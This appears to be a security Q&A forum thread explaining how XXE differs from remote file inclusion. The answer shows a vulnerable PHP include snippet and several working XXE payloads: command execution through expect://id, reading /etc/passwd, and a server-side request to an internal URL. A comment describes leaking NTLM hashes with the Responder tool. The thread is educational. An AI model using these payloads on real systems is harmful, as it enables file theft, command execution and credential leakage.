1

I was just studying about the XML external entities attack and Remote File Inclusion Attack.

According to my understanding, the XML external entities attack is where the XML parser in the web application has the option of external entities enabled and the attacker can parse an external XML from a remote server and execute commands or read local system files.

While the remote file inclusion attack is where the attacker is able to make the system execute the a file that lies on a remote server and the contents of this file may also be malicious and the attacker can access system level files or can even install a backdoor using this vulnerability.

I am not able to differentiate between XML external entities attack and remote file inclusion attack as both the attacks mean that a remote file execution can lead to leaking of the information.

Anders
  • 64,406
  • 24
  • 178
  • 215
Skynet
  • 598
  • 5
  • 12

1 Answers1

1

The most notorious programming language for remote file inclusion is PHP. The following is the php example code for PHP remote file inclusion vulnerability from wikipedia article "File Inlucsion Vulnerability". In this example, code from an external server is included, thus it is run by the vulnerable application. Remote file inclusion is a remote code execution class vulnerability.

<?php
   if ( isset( $_GET['language'] ) ) {
      include( $_GET['language'] . '.php' );
   }
?>

An XXE (XML External Entity) vulnerability can also be similar to the example above. The following is an example from OWASP abuses the expect scheme to execute code. This is only for PHP.

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://id" >]>
    <creds>
       <user>&xxe;</user>
       <pass>mypass</pass>
    </creds>

The expect scheme execute the command (on OS level, rather than as PHP code). PHP has a document that explain how the expect scheme is meant to be used.

But if we remove focus from PHP, and look at web application in general, XXE can often only be abused to look at local files (or remote files the vulnerable web application have network access to). Commonly done with the following payload:

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Another misuse case for XXE, is that it can be used to trigger sensitive calls to internal web applications using the GET method. For instance:

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "https://internal.hawaii.gov/api/pacom/alert" >]><foo>&xxe;</foo>

But the bottom line is that remote file inclusion and XXE is unrelated. Both might lead to remote code execution. But generally, remote file inclusion is remote code execution and XXE is abused to steal data from local files (on the server)

Dog eat cat world
  • 5,759
  • 1
  • 27
  • 46
  • I pretty much got the above stated examples, so we can only use XXE to access local stuff in a malicious (OS level) while in remote file execution we can access only the language level stuff (in the above case PHP). Is that right? – Skynet Jan 28 '18 at 01:45
  • Yeah, thats basically it. But another interesting abuse of XXE, is to make the XML parser download an external file over a protocol that require authentication. Sometimes, you can make the application leak its NTLM hash over SMB or over HTTP. This tool is good for this: https://github.com/SpiderLabs/Responder – Dog eat cat world Jan 28 '18 at 14:20